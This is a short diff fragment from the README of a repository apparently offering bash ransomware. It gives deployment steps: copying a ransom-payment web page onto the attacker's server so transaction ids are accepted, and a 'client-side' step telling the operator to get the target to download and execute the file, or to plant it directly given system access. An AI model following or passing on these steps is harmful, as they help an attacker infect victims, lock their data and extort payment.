SubtleScope/bash-ransomware/README.md

    - `exit`
    - Web pages:
      - `cp -R exchange/ /var/www/html`
+ - Note: You must use this in order to get a transaction id that will be accepted by the payment page

 ## What to do on the client-side
  - Get target to download the file and execute or if you have have access to the system, download it directly